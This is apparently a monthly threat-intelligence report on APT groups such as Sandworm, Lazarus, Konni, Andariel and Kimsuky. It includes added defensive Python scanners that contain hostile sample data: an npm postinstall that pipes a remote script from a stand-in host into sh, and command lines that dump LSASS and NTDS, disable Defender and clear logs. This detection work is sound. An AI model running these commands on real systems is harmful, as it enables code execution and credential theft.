January 2026 APT Group Trends Report
Key APT Groups
Sandworm attempted to destroy OT and IT equipment using DynoWiper after exploiting a vulnerable configuration of FortiGate, targeting at least 30 energy facilities, including wind and solar power plants in Poland, by the end of December 2025. They directly damaged RTUs, IEDs, and serial devices or manipulated settings to cause loss of remote control and operational disruption, and even conducted large-scale wiper deployment using GPO. This represents the most significant sabotage attack that has caused a substantial impact on the stability of the European power grid, making it the top priority threat group this month.
Lazarus has maximized its server shutdown response capability by utilizing Polygon NFT contracts as a Dead Drop to replace the blocked Pastebin. By combining the runOn: folderOpen auto-execution feature of VSCode with npm script hijacking, it has implemented a supply chain attack that allows malicious code to execute immediately in the developer environment without user intervention. A modular stealer that can compromise wallets, password managers, and SSH keys is included, highlighting the serious potential for damage to developers and Web3 organizations.
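A defender-side scan for the two auto-execution hooks the Lazarus chain above combines (a VS Code task with runOn: folderOpen and npm lifecycle scripts). This is an added example, not code from the report; the tasks.json and package.json contents it checks are constructed samples.

```python
"""Scan a repository's auto-run hooks (added example, not code from the report).

The Lazarus summary above pairs a VS Code task with runOptions.runOn = "folderOpen"
with npm script hijacking, so that code runs as soon as a developer opens the folder
or installs dependencies. The two sample files below are constructed, not real IOCs.
"""
import json
import re

# npm lifecycle hooks that run automatically during `npm install`
NPM_AUTO_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
# Heuristic: command fragments worth a closer look inside an auto-run hook
SUSPICIOUS = re.compile(r"curl|wget|node\s+-e|eval\(|base64|powershell|\|\s*sh\b", re.I)

def scan_vscode_tasks(tasks_json: str) -> list[str]:
    """Return one finding per task configured to run when the folder is opened."""
    findings = []
    for task in json.loads(tasks_json).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            label, cmd = task.get("label", "?"), task.get("command", "")
            findings.append(f"tasks.json: task '{label}' runs on folderOpen: {cmd}")
    return findings

def scan_npm_scripts(package_json: str) -> list[str]:
    """Return one finding per lifecycle hook whose command matches the heuristic."""
    findings = []
    for hook, cmd in json.loads(package_json).get("scripts", {}).items():
        if hook in NPM_AUTO_HOOKS and SUSPICIOUS.search(cmd):
            findings.append(f"package.json: {hook} hook looks suspicious: {cmd}")
    return findings

# Constructed .vscode/tasks.json: a normal build task plus one that fires on folder open
SAMPLE_TASKS = json.dumps({"version": "2.0.0", "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "setup", "type": "shell", "command": "node .vscode/setup.js",
     "runOptions": {"runOn": "folderOpen"}},
]})
# Constructed package.json: the postinstall hook pulls and runs a remote script
SAMPLE_PACKAGE = json.dumps({"name": "demo", "scripts": {
    "test": "jest",
    "postinstall": "curl -s http://example.invalid/setup.sh | sh",
}})

def triage() -> list[str]:
    """Run both scanners over the constructed samples."""
    return scan_vscode_tasks(SAMPLE_TASKS) + scan_npm_scripts(SAMPLE_PACKAGE)

if __name__ == "__main__":
    for finding in triage():
        print(finding)
```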
Konni utilized an AI-generated PowerShell backdoor and employed sophisticated evasion techniques that exploit the advertisement redirection structures of Google and NAVER so that its traffic appears legitimate. By combining various vectors such as ZIP+LNK-based execution chains, AutoIt scripts disguised as PDFs, and compromised WordPress servers, it has made detection more difficult. Notably, multiple campaigns targeting developers and blockchain infrastructure have been identified, expanding the long-term infiltration risk across various countries and industries.
UAT-7290 has sustained long-term infiltration of telecommunications infrastructure in South Asia and Southeast Europe by combining edge device vulnerabilities, SSH brute force, and 1-day exploits. It is characterized by converting compromised devices into Bulbature implants that serve as ORB (relay) infrastructure, establishing a long-term foothold that other attackers can also use. Continuous monitoring is increasingly necessary because of the rise in wide-area espionage activity and the potential supply chain risk of abused inter-country telecommunications infrastructure.
Major APT Group Trends by Region
1) North Korea
North Korean-based threat actors have intensified their activities by targeting blockchain and cryptocurrency infrastructure as primary attack vectors. Konni is leveraging AI-generated PowerShell backdoors to target developers and engineering teams, while Lazarus has concealed its command and control (C2) infrastructure using a blockchain-based hidden command delivery mechanism (Dead Drop Resolver) instead of Pastebin. These actors have enhanced their social engineering techniques by masquerading as legitimate companies or disguising actual project documents, and they have attempted to steal wallets, API credentials, and cryptocurrency assets through infiltration of development environments. Overall, threat actors are actively adopting cutting-edge technologies such as AI and blockchain to enhance their evasion tactics and persistence, thereby advancing their attack methods.
Andariel
Andariel has been confirmed to be conducting infiltration, reconnaissance, and credential theft using TigerRAT and new RATs (StarshellRAT/JelusRAT/GopherRAT) against the European public/legal sector and the Korean ERP software supply chain.
| Case 1. | |
|---|---|
| Time | 2025 |
| Targets | European public and legal-sector institutions |
| | Korean ERP software vendors and their ERP-using clients |
| Initial Access | In Korea, supply chain attacks through ERP software companies |
| Exploited Vulnerabilities | Unknown |
| Malware and Tools | TigerRAT: custom RAT for initial foothold and command execution |
| | JelusRAT: second-stage RAT with in-memory loading and plugin-based extended functionality |
| | StarshellRAT: .NET RAT with command execution, file exfiltration and screenshot functionality |
| | GopherRAT: Golang RAT with file/folder exfiltration, SOCKS tunneling and system enumeration functionality |
| | ASPXSHELL/TigerShell: web shells for web server control and command execution |
| | Custom port scanner (ps.exe): internal network port scanning |
| | PetitPotato (custom): MS-EFSR privilege escalation |
| | BYOVD (Process Explorer driver abuse): EDR/security process termination |
| | Procdump/PassView/Plink/Socks5Server: auxiliary tools for credential theft and tunneling |
| Techniques | Persistence and re-execution via Scheduled Tasks |
| | Collection of domain and user credentials via LSASS/NTDS/registry dumps |
| | Internal asset and network reconnaissance via PowerShell, WMIC and netstat |
| | Lateral movement via RDP and Impacket |
| | Detection evasion by disabling Windows Defender and adding exclusions |
| | Forensic disruption through deletion of files, tools and artifacts |
| | Supply chain infection through trojanized ERP update paths |
| | Covert communication through in-memory execution and web shells |
| Impact | Theft of domain and user credentials |
| | Potential leakage of internal system and AD information |
| | Access to and collection of sensitive documents related to money laundering |
| | Risk of secondary infection for multiple ERP customers |
| Description | Andariel conducted two independent intrusions in different regions and with different methods |
| | One is a direct-intrusion RAT operation; the other is a supply chain attack exploiting software update chains |
| Source | To the past and beyond: Andariel’s latest arsenal and cyberattacks [1] |
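Command-line triage for the techniques listed in the Andariel table: scheduled-task persistence, LSASS/NTDS credential dumps, Windows Defender tampering and artifact deletion. This is an added example, not code from the report or the cited source; the process-creation events it runs over are constructed samples.

```python
"""Command-line triage for the Andariel techniques in the table above (added example, not
from the report or the cited source). Each rule is a regex over process command lines for
one technique row: scheduled-task persistence, LSASS/NTDS credential dumps, Defender
tampering and artifact deletion. The process-creation events below are constructed.
"""
import re

RULES = {
    "persistence: scheduled task created": r"\bschtasks(\.exe)?\b.*\s/create\b",
    "credential access: LSASS dump via procdump": r"\bprocdump(64)?(\.exe)?\b.*\blsass",
    "credential access: NTDS export via ntdsutil": r"\bntdsutil(\.exe)?\b.*\bifm\b",
    "defense evasion: Defender protection disabled": r"Set-MpPreference\b.*-Disable\w+",
    "defense evasion: Defender exclusion added": r"Add-MpPreference\b.*-Exclusion\w+",
    "anti-forensics: event log cleared": r"\bwevtutil(\.exe)?\b.*\bcl\b",
}
COMPILED = [(name, re.compile(pattern, re.I)) for name, pattern in RULES.items()]

def classify(cmdline: str) -> list[str]:
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]

def triage(events: list[dict]) -> list[tuple[str, str, str]]:
    """Return (host, rule, cmdline) for each event that matches at least one rule."""
    return [(ev["host"], rule, ev["cmdline"])
            for ev in events for rule in classify(ev["cmdline"])]

# Constructed process-creation events (the shape of Sysmon Event ID 1 / Security 4688 data)
SAMPLE_EVENTS = [
    {"host": "ERP-SRV01", "cmdline": 'schtasks /create /sc minute /mo 10 /tn "Updater" /tr C:\\Users\\Public\\svc.exe'},
    {"host": "ERP-SRV01", "cmdline": "procdump64.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\l.dmp"},
    {"host": "DC01", "cmdline": 'ntdsutil "ac i ntds" "ifm" "create full C:\\Temp\\x" q q'},
    {"host": "WS-014", "cmdline": "powershell -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "WS-014", "cmdline": "powershell -c Add-MpPreference -ExclusionPath C:\\Users\\Public"},
    {"host": "ERP-SRV01", "cmdline": "wevtutil cl Security"},
    {"host": "WS-014", "cmdline": "notepad.exe C:\\Users\\alice\\notes.txt"},
]

if __name__ == "__main__":
    for host, rule, cmd in triage(SAMPLE_EVENTS):
        print(f"{host}: {rule} :: {cmd}")
```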
Kimsuky
In May 2025, an entity presumed to be Kimsuky targeted activists working on North Korea issues, inducing LNK execution through MEGA link-based spear phishing and downloading additional PowerShell-based payloads to conduct information theft and command execution over a Dropbox C2 channel.
| Case 1. | |
|---|---|
| Time | May 2025 |
| Targets | Activists in South Korea working on North Korea issues |
| Initial Access | Spear phishing email |
| | Inducing clicks on MEGA cloud links in the email |
| | Inducing execution of the LNK (shortcut) inside the downloaded ZIP |
| | LNK execution runs a PowerShell script that downloads and executes additional malicious files |
| Exploited Vulnerabilities | None |
| Malware and Tools | LNK (shortcut): payloads embedded at internal offsets in its ExtraData; execution triggers the creation of multiple malicious files |
| | PowerShell: downloads and executes additional malicious files; collects and uploads system information |
| | ms.exe: launcher with a valid signature (Adersoft certificate); includes logic to auto-load and verify the manifest in the same path |
| | ms.exe.manifest: contains Base64-encoded data; executes VBS after decoding |
| | 1.vbs: triggers execution of pc366.ps1 |
| | pc366.ps1: exfiltrates system information to Dropbox; receives and executes additional files from Dropbox |
| | tmp.ini / park_yyy_MM-dd__HH_mm_info.ini: filenames used to store and upload the collected information |
| | 1.bat: downloads and executes additional files from the attacker’s server |
| | default_an.vbs: executes PowerShell with the console hidden and runs default_an.ps1 |
| | default_an.ps1: hides and removes AnyDesk window/tray traces, then executes default_an.exe |
| | default_an.exe: AnyDesk executable (described as version 5.5.3.0) |
| | service.conf / system.conf: described as AnyDesk configuration files |
| | default5 (XML): Scheduled Task definition that registers default_an.vbs to run every 5 minutes |
| | curl: used for additional file downloads |
| Techniques | Multiple payloads hidden in LNK ExtraData, XOR-decoded (key 0xAD) and written to disk step by step |
| | Decoy document shown to the user (a normal-looking document is displayed) |
| | Scheduled Task registration for periodic execution (ms.exe every 18 minutes, default_an.vbs every 5 minutes) |
| | Abuse of a legitimate cloud service (Dropbox) for C2 communication and data upload |
| | System information collection (processes, OS version, public IP, antivirus products, etc.) |
| | Concealment of remote-control tool (AnyDesk) UI traces (window/tray icon hiding and deletion) |
| | Parameter-based download infrastructure (d.php with the newpa parameter) for flexible delivery of multiple files |
| Impact | Theft of the victim’s system information and upload to Dropbox |
| | Receipt and execution of additional files carrying the attacker’s commands |
| Description | Malicious ZIP files distributed via MEGA links in spear phishing against activists working on North Korea issues; when the LNK is executed, PowerShell downloads and executes additional payloads |
| | Dropbox used as the C2 channel for uploading collected information and receiving files that carry further commands |
| | The ms.exe (legitimately signed launcher) + .manifest (Base64 VBS) loading method and the pprb/d.php?newpa= download infrastructure point to Kimsuky (APT43) |
| Source | [Monthly threat analysis] Latest information theft cases by the Kimsuky attack group using Dropbox [2] |
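Two triage helpers for the Kimsuky chain above: carving XOR-0xAD encoded payloads out of an LNK ExtraData blob, and flagging the d.php?newpa= downloads and Dropbox uploads in proxy logs. This is an added example, not code from the report or the cited source; the ExtraData bytes, the example.invalid host and the log lines are constructed.

```python
"""Triage helpers for the Kimsuky LNK chain above (added example, not from the report).
xor_carve() XOR-decodes (key 0xAD) an LNK ExtraData blob and reports offsets of known
file signatures; flag_urls() picks d.php?newpa= downloads and Dropbox uploads out of
proxy log lines. All sample bytes and log lines below are constructed.
"""
import re
XOR_KEY = 0xAD
# Signatures for the file types the chain drops: PE, XML task/manifest, VBS, PowerShell, batch
SIGNATURES = {
    b"MZ": "PE executable",
    b"<?xml": "XML (manifest or task definition)",
    b"CreateObject(": "VBScript",
    b"powershell": "PowerShell launcher",
    b"@echo off": "Batch script",
}

def xor_carve(blob: bytes, key: int = XOR_KEY) -> list[tuple[int, str]]:
    """XOR-decode the blob with a single-byte key and return sorted (offset, type) hits."""
    decoded = bytes(b ^ key for b in blob)
    hits = []
    for magic, label in SIGNATURES.items():
        start = 0
        while (pos := decoded.find(magic, start)) != -1:
            hits.append((pos, label))
            start = pos + 1
    return sorted(hits)

PATTERNS = [
    ("download via d.php?newpa=", re.compile(r"/d\.php\?newpa=", re.I)),
    ("upload to Dropbox API", re.compile(r"https?://content\.dropboxapi\.com/2/files/upload", re.I)),
]

def flag_urls(log_lines: list[str]) -> list[tuple[str, str]]:
    """Return (reason, line) for each proxy log line matching one of the patterns."""
    return [(reason, line) for line in log_lines for reason, rx in PATTERNS if rx.search(line)]

# Constructed ExtraData: a VBS stub and an XML stub, each XOR-0xAD encoded, with zero padding
_PLAIN = (b"\x00" * 16 + b'Set objShell = CreateObject("WScript.Shell")\r\n'
          + b"\x00" * 8 + b'<?xml version="1.0"?><Task/>')
SAMPLE_EXTRADATA = bytes(b ^ XOR_KEY for b in _PLAIN)
# Constructed proxy log lines (example.invalid stands in for the attacker's server)
SAMPLE_LOG = [
    "2025-05-12 09:14:03 10.0.0.21 GET http://example.invalid/pprb/d.php?newpa=ms.exe 200",
    "2025-05-12 09:14:05 10.0.0.21 POST https://content.dropboxapi.com/2/files/upload 200",
    "2025-05-12 09:15:00 10.0.0.22 GET https://www.example.com/index.html 200",
]

if __name__ == "__main__":
    print(xor_carve(SAMPLE_EXTRADATA))
    print(flag_urls(SAMPLE_LOG))
```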
[1] https://labs.withsecure.com/publications/andariel-2025
[2] https://plainbit.co.kr/kr/insight/tech_hub?bgu=view&idx=62